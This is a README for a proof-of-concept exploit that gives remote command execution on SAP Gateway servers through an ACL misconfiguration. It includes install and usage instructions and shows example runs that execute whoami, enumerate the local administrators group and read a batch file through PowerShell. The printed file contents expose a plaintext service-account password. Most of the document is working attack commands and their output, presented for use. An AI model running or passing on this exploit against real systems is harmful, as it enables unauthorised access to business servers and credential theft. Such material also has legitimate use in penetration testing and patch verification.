SAP Gateway RCE

This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).

SAPanonGWv1.py is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!).

SAPanonGWv2.py is the second version of the exploit based on the pysap library.

Installation

git clone https://github.com/chipik/SAP_GW_RCE_exploit.git

Usage

python2 SAPanonGWv1.py

Flags

-t TARGET
-p PORT
-c CMD
-v VERBOSE
-o OUTPUT

Examples

WhoAmI

$ python2 SAPanonGWv1.py -t 10.10.10.10 -p 3300 -c whoami
[*] sending cmd:whoami
saphost\sapserviceadm

Local Administrators Group

$ python2 SAPanonGWv1.py -t 10.10.10.10 -p 3300 -c "net localgroup administrators"                
[*] sending cmd:net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator

admlocal
crypt0rr
The command completed successfully.

Files via PowerShell

$ python2 SAPanonGWv1.py -t 10.10.10.10 -p 3300 -c "powershell.exe -c type c:\SAP\stop_sap.bat"
[*] sending cmd:powershell.exe -c type c:\SAP\Stop_sap.bat
@Echo ATTENTION - YOU ARE GOING TO STOP SAP
PAUSE
sapcontrol -nr 00 -user sapserviceadm Welkom1234! -function Stop

URL list